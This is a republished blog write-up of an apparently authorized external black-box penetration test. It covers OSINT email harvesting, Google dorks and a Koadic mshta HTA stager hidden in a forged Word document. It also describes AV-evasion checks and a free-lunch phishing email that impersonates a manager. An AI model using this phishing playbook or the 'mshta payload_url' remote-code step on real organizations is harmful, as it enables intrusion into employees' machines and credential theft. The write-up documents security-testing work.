• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2019
  • June
  • 7
  • How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information

How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information

June 7, 2019 Comments Off on How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information
Black box example black box penetration testing external black box penetration testing how to black box penetration testing

The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide. As such, asides, the company name, we were given “ZERO” information to perform an external black-box penetration Testing.

This black-box external penetration Testing Performing with a by a client called (Hackme) 

OSINT 101

We kicked off with some Open Source Intelligence (OSINT) 101 :). There are quite a number of open source intelligence tools – to assist in gathering emails, subdomains, hosts, employee names, etc from different public sources like search engines and shodan. There is an exhaustive list of such awesome tools here .

Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization using Black-box Penetration Testing methods.

With Google dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” .

Also Read:  Network Penetration Testing Tools 

Of course, our aim was not to tirelessly search for documents. Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint, and Excel). One can also use FOCA for this.

How To Perform External

From this, I noticed that employees emails followed a particular naming convention – the first letter of the firstname + surname @ domain.com i.e. [email protected].

Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax:

site:linkedin.com -inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc as a reference company.

By hacking a script to automate the process, we copied out the first names, last names and the roles of the current employees of Hackme.

A tiring approach is to manually crawl through the google pages in search for these names and role or one could also use GoogleScraper:

GoogleScraper -m http –keyword “site:linkedin.com -inurl:dir ‘at Hackme’ ‘Current’” –num-pages-for-keyword 3 –output-filename output.json

Black-box Penetration Testing

Result:  Black-box Penetration Testing

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.

Black-box Penetration Testing

then using your favorite word processor (word merge, notepad++, etc) or some good scriptful skills, merge the firstname + lastname – to form your email list.

Feed our Target list a Payload

Since we are simulating a Black-box Penetration Testing, we decided (just like what an attacker would do) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via emails to employees of Hackme.

We also know that it is a common practice for some file type/extensions to be blocked by the organization’s email filters – to limit exposure to risk.

This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire.

What made it really stand out asides the beautiful interface is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan local network for open SMB, pivot to another machine, load mimikatz and a lot more.

So we ran Koadic and set the necessary variables – using the “stager/js/mshta “ module (serves payloads in memory using MSHTA.exe HTML Applications).

Black-box Penetration Testing

The result was a spawn of our HTA payload URL as evidenced in the screenshot above. However, we need our targets to execute our payload as “mshta payload_url“.

In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.

Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.

Black-box Penetration Testing

Thankfully, we saw the tip on the left from Matt Nelson and interestingly, the team at NCC group have this implemented in Demiguise.

So here is our final payload saved as a .hta file.

Black-box Penetration Testing

The next step typically is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

  1. Send a Microsoft word document with our .hta payload embedded as an OLE object.
  2. Get the user to open the word document and the embedded OLE object.
  3. This spawns a new process and we get a shell access into our victim’s PC.

Now we get to the interesting part, we need our victim to open the Microsoft word document and our payload.

To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme – specifically the culture and employees behavior. The question we kept asking ourselves was “what would interest the employees?”

Where else to get this information than Glassdoor , a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:

…and more recon

We need to know more about the target organization’s environment – specifically employees. The question we kept asking ourselves – what would interest the employees?

Where else to get this information than Glassdoor, a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of the target organization on Glassdoor, we found some common themes:

  1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.
  2. Employees love the organization because they get free lunch.
Black-box Penetration Testing

But Wait!

Like the old saying goes, the fastest way to a man’s heart is through his stomach. So what better way to get the employees to open our payload embedded word document?

Send them an email – telling them there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with Hackme email signature while observing the organization email culture.

Now, how do we make our email more believable? By sending an email to Customer service/Help Desk with a service request and observing the email signature in the response.

… recon again???

We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.

Black-box Penetration Testing

We are halfway through sending our payload now. Have some patience and read on…

It’s time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like.

I then created a new word document like the one shown below with a splitting image of Hackme document template with appropriate headers/footers.

Then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and also the caption to reflect our message.
Black-box Penetration Testing

Change the icon to Microsoft Word’s icon and also, change the caption to reflect your message.

Don’t Forget the Anti-virus!!!

To check the AV detection rate of our payload – and to see if it will be flagged as malicious by Hackme antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file as well.

Black-box Penetration Testing

AV Scan of our .hta payload (0 detections)

It’s Time to Send our Email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistic Manager or Admin Manager’s email address.

In this case, I created a Gmail account (yes, Gmail works too) using the Logistic Manager’s first name and last name – and then spiced it up with his signature which was gotten earlier.

Black-box Penetration Testing

Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!

Black-box Penetration Testing

What next?

The rest they often say is history. From here-on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems and even became domain admins etc.

In conclusion

All in all, this was a very fun engagement. Whilst it may take an attacker a month/2months/a year of dedication to break into an organization – through a loophole at the infrastructure level. It can be fairly easy for one to gain access by exploiting the human factor.

“Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.

The moral of the exercise is: Recon, recon and more recon – for a wise man once said

“Give me six hours to chop down a tree and I will spend the first four sharpening the axe“.

Original Source & Credits: 

Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk, and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.

Post navigation

Network Penetration Testing Tools for Hackers and Security Professionals
ToRat: Remote Administation Tool using Tor as a Transport Mechanism

Related Articles

Seekr: multi-purpose toolkit for gathering and managing OSINT Data

Seekr: multi-purpose toolkit for gathering and managing OSINT Data

- Hack Tools
February 7, 2023
reportly: AzureAD user activity report tool

reportly: AzureAD user activity report tool

- Hack Tools
February 7, 2023
PoC Exploit For GoAnywhere MFT 0-Day Flaw (CVE-2023-0669) Published Online

PoC Exploit For GoAnywhere MFT 0-Day Flaw (CVE-2023-0669) Published Online

- Hack Tools
February 7, 2023
hacker gadgets
hacker phone covers

Recent Posts

Seekr: multi-purpose toolkit for gathering and managing OSINT Data

Seekr: multi-purpose toolkit for gathering and managing OSINT Data

February 7, 2023
reportly: AzureAD user activity report tool

reportly: AzureAD user activity report tool

February 7, 2023
PoC Exploit For GoAnywhere MFT 0-Day Flaw (CVE-2023-0669) Published Online

PoC Exploit For GoAnywhere MFT 0-Day Flaw (CVE-2023-0669) Published Online

February 7, 2023
FirmAE: Towards Large-Scale Emulation of IoT Firmware for Dynamic Analysis

FirmAE: Towards Large-Scale Emulation of IoT Firmware for Dynamic Analysis

February 6, 2023
Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C

Heap_Detective – The Simple Way To Detect Heap Memory Pitfalls In C++ And C

February 6, 2023
OneNoteAnalyzer: analyzing malicious OneNote documents

OneNoteAnalyzer: analyzing malicious OneNote documents

February 6, 2023

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs

About Us

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Join Our Community!

Please wait...
Get the latest News and Hacking Tools delivered to your inbox.
Don't Worry ! You will not be spammed

Active Members

Submit a Tool

Hackers Handbook 2018


Grab your copy here

ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW